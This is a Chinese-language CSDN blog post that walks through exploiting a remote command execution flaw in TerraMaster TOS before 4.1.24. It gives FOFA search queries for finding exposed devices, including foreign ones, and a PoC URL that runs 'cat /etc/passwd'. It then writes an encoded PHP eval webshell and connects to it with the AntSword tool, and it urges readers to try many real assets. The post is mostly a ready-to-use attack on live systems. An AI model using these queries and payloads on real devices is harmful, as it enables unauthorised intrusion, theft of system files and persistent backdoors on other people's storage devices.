记录一次复现TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞

本文详细介绍了如何复现TerraMasterTOS4.1.24版本之前的远程命令执行漏洞,包括使用FOFA搜索引擎寻找受影响资产,通过构造POC验证漏洞,并演示了写入shell和利用webshell进行连接的步骤。
摘要由CSDN通过智能技术生成

今天刚学完命令执行与代码执行,准备复现一下,发现TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞,那就复现它了。

漏洞影响

TerraMaster TOS < 4.1.24

1、先搜索相关资产

在这里我使用的是fofa搜索引擎,构造的语句也是fofa语句,考虑到大家有的没有fofa搜索引擎特意在此送上网址 

网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统undefined

fofa语句:"TerraMaster" && header="TOS"

以上搜索的是国内资产,大家要是想要国外的资产,可以使用以下语句:

国外的:"TerraMaster" && header="TOS" && country!="CN"

在这里特意说明一下:搜索的资产不能百分百说是某国家的,但大部分都是。

2、使用以下poc验证即可

首先在网址后面拼接以下poc,尝试写入文件test.txt

poc:/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt

拼接完上面的,换成以下拼接,尝试是否能够成功读取到test.txt文件内容

poc:/include/test.txt

读取的内容是/etc/passwd,要是出现如下内容,那就恭喜你,复现成功,没出现的也不要放弃,资产比较多,复现是需要慢慢来的,重要的是不能半途而废。

 以上都出现了,说明此次复现结束;以下内容是复现外的扩展,可做可不做,讲述如何写入shell,并连接。(必须复现成功才能做扩展)

1、拼接以下,写入一句话木马

/include/exportUser.php?type=3&cla=application&func=_exec&opt=(echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4="|base64 -d)>shell.php

2、拼接完以上的,换成以下的进行再次拼接读取shell.php

/include/shell.php

3、使用webshell连接工具进行连接,我使用的是中国蚁剑,密码是1,网址后面拼接以下进行连接即可。

/include/shell.php

到这里此次复现圆满结束,最后告诉大家,大部分存在命令与代码执行的漏洞,大概率都能拿到shell,复现类似的漏洞,希望大家能够做的圆满些;小编是个小白,哪里不行请大家告知,小编会进行学习并修改。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值